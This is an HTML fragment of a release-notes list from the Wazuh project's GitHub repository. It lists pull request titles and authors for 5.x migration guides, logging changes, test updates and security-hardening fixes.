<li>Use per-target rpath and remove redundant LD_LIBRARY_PATH/WAZUH_ENGINE_GROUP exports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531005682" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36455" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36455/hovercard" href="https://github.com/wazuh/wazuh/pull/36455">#36455</a></li>
<li>Fix changelog chronological order and update bumper script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4569560130" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36729" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36729/hovercard" href="https://github.com/wazuh/wazuh/pull/36729">#36729</a></li>
<li>Monitoring a symlink without follow_symbolic_link by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4444803761" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36081" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36081/hovercard" href="https://github.com/wazuh/wazuh/pull/36081">#36081</a></li>
<li>SCA policies migration guide from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550901765" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36671" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36671/hovercard" href="https://github.com/wazuh/wazuh/pull/36671">#36671</a></li>
<li>Fix 5x  wazuhdb integration tests  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562864780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36713" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36713/hovercard" href="https://github.com/wazuh/wazuh/pull/36713">#36713</a></li>
<li>Downgrade transient manager-reported sync failures logs to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576461814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36744" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36744/hovercard" href="https://github.com/wazuh/wazuh/pull/36744">#36744</a></li>
<li>Show sca timouts as Not Run by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488962491" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36258" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36258/hovercard" href="https://github.com/wazuh/wazuh/pull/36258">#36258</a></li>
<li>Authd workflow creation for 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522600046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36404" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36404/hovercard" href="https://github.com/wazuh/wazuh/pull/36404">#36404</a></li>
<li>Adapt remoted tests to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541524155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36609" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36609/hovercard" href="https://github.com/wazuh/wazuh/pull/36609">#36609</a></li>
<li>Update unclassified event criteria by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551542627" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36681" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36681/hovercard" href="https://github.com/wazuh/wazuh/pull/36681">#36681</a></li>
<li>use safeloader in yaml file loader by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582767203" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36753" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36753/hovercard" href="https://github.com/wazuh/wazuh/pull/36753">#36753</a></li>
<li>Downgrade expected modulesd socket warnings/errors during agent restart to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583215822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36755" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36755/hovercard" href="https://github.com/wazuh/wazuh/pull/36755">#36755</a></li>
<li>Documentation: Ciscat and openscap migration to SCA by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4566095438" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36723" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36723/hovercard" href="https://github.com/wazuh/wazuh/pull/36723">#36723</a></li>
<li>Document the deprecation of OSquery in order to use IT Hygiene in version 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583642489" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36756" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36756/hovercard" href="https://github.com/wazuh/wazuh/pull/36756">#36756</a></li>
<li>Preserve wazuh-syscheckd Full Disk Access attribution on macOS reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583103632" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36754" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36754/hovercard" href="https://github.com/wazuh/wazuh/pull/36754">#36754</a></li>
<li>Normalize severity Msg  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588829137" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36759" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36759/hovercard" href="https://github.com/wazuh/wazuh/pull/36759">#36759</a></li>
<li>Agent Groups 5x Migration Guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568131074" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36726" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36726/hovercard" href="https://github.com/wazuh/wazuh/pull/36726">#36726</a></li>
<li>Add NULL validation for optional FlatBuffer fields in inventory_sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598119007" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36773/hovercard" href="https://github.com/wazuh/wazuh/pull/36773">#36773</a></li>
<li>Fix agent keepalive scheduling after system clock rollback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503704905" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36338" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36338/hovercard" href="https://github.com/wazuh/wazuh/pull/36338">#36338</a></li>
<li>Create integratord migration guide to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li>Syslog output (csyslogd) 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gonzaarancibia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gonzaarancibia">@gonzaarancibia</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573759572" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36741" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36741/hovercard" href="https://github.com/wazuh/wazuh/pull/36741">#36741</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596517095" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36767" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36767/hovercard" href="https://github.com/wazuh/wazuh/pull/36767">#36767</a></li>
<li>Migration documentation: syslog input alternative by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613452406" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36781" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36781/hovercard" href="https://github.com/wazuh/wazuh/pull/36781">#36781</a></li>
<li>Drop libcrypt dependency from Python dep by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a></li>
<li>Change duplicated link to intented one by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619366060" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36794" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36794/hovercard" href="https://github.com/wazuh/wazuh/pull/36794">#36794</a></li>
<li>Add centralized input validation for active response framework by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578234540" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36745" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36745/hovercard" href="https://github.com/wazuh/wazuh/pull/36745">#36745</a></li>
<li>Fix sca check for etc/shadow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619503472" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36795" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36795/hovercard" href="https://github.com/wazuh/wazuh/pull/36795">#36795</a></li>
<li>Align remoted metrics shipper with new field names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572800781" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36740" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36740/hovercard" href="https://github.com/wazuh/wazuh/pull/36740">#36740</a></li>
<li>Fix wrap PolicyBanner stat in 'sh -c' so glob expands in macOS SCA check 41062 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615585186" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36783" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36783/hovercard" href="https://github.com/wazuh/wazuh/pull/36783">#36783</a></li>
<li>Bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623354993" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36801" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36801/hovercard" href="https://github.com/wazuh/wazuh/pull/36801">#36801</a></li>
<li>Defer module coordination while FIM first sync is in progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591815012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36762" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36762/hovercard" href="https://github.com/wazuh/wazuh/pull/36762">#36762</a></li>
<li>Revert "Bump main branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623582882" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36802" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36802/hovercard" href="https://github.com/wazuh/wazuh/pull/36802">#36802</a></li>
<li>Change log severity for recoverable and expected conditions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615970610" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36786" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36786/hovercard" href="https://github.com/wazuh/wazuh/pull/36786">#36786</a></li>
<li>Prevent data race in schema validator factory concurrent initialization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616512800" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36789" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36789/hovercard" href="https://github.com/wazuh/wazuh/pull/36789">#36789</a></li>
<li>Schema generation for dotted and nested field mappings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536240667" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36473" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36473/hovercard" href="https://github.com/wazuh/wazuh/pull/36473">#36473</a></li>
<li>Engine support null values in schema validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535313001" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36470" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36470/hovercard" href="https://github.com/wazuh/wazuh/pull/36470">#36470</a></li>
<li>docs: add Active Response 4.x to 5.x migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
<li>Use env mappings for variable passing in builderpackage workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572105403" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36738" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36738/hovercard" href="https://github.com/wazuh/wazuh/pull/36738">#36738</a></li>
<li>Adds 4.x to 5.x migration documentation. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615736469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36785" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36785/hovercard" href="https://github.com/wazuh/wazuh/pull/36785">#36785</a></li>
<li>Fix AWS cross-account SQS queue URL when using iam_role_arn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617279433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36791" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36791/hovercard" href="https://github.com/wazuh/wazuh/pull/36791">#36791</a></li>
<li>Fix enrollment key validation and improve input handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4629562793" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36807" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36807/hovercard" href="https://github.com/wazuh/wazuh/pull/36807">#36807</a></li>
<li>Lower agent_sync_protocol and module sync log levels to reduce false-alarm noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634109312" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36817" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36817/hovercard" href="https://github.com/wazuh/wazuh/pull/36817">#36817</a></li>
<li>Add unit tests for utils, aws_tools, DockerListener, gcloud and azure modules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591653615" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36761" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36761/hovercard" href="https://github.com/wazuh/wazuh/pull/36761">#36761</a></li>
<li>Normalize numeric inode to string events (6960) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641496397" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36837" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36837/hovercard" href="https://github.com/wazuh/wazuh/pull/36837">#36837</a></li>
<li>Prevent indexer consumer wait during shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640571004" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36836" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36836/hovercard" href="https://github.com/wazuh/wazuh/pull/36836">#36836</a></li>
<li>Update manager 5x documentation  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639437920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36833/hovercard" href="https://github.com/wazuh/wazuh/pull/36833">#36833</a></li>
<li>Add bump-issue-link support to bumper workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664679055" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36868" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36868/hovercard" href="https://github.com/wazuh/wazuh/pull/36868">#36868</a></li>
<li>Add guide for migrating manager coordinator from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639020634" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36829" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36829/hovercard" href="https://github.com/wazuh/wazuh/pull/36829">#36829</a></li>
<li>Add Wazuh Manager Configuration documentation from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4611934920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36779" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36779/hovercard" href="https://github.com/wazuh/wazuh/pull/36779">#36779</a></li>
<li>Add documentation to migrate filebeat to indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664131019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36866/hovercard" href="https://github.com/wazuh/wazuh/pull/36866">#36866</a></li>
<li>wazuh-manager: Benchmark and footprint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456748469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36145" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36145/hovercard" href="https://github.com/wazuh/wazuh/pull/36145">#36145</a></li>
<li>Update manager upgrade block message by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4681713013" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36987" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36987/hovercard" href="https://github.com/wazuh/wazuh/pull/36987">#36987</a></li>
<li>5.x PR workflows improvements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596503652" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36766" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36766/hovercard" href="https://github.com/wazuh/wazuh/pull/36766">#36766</a></li>
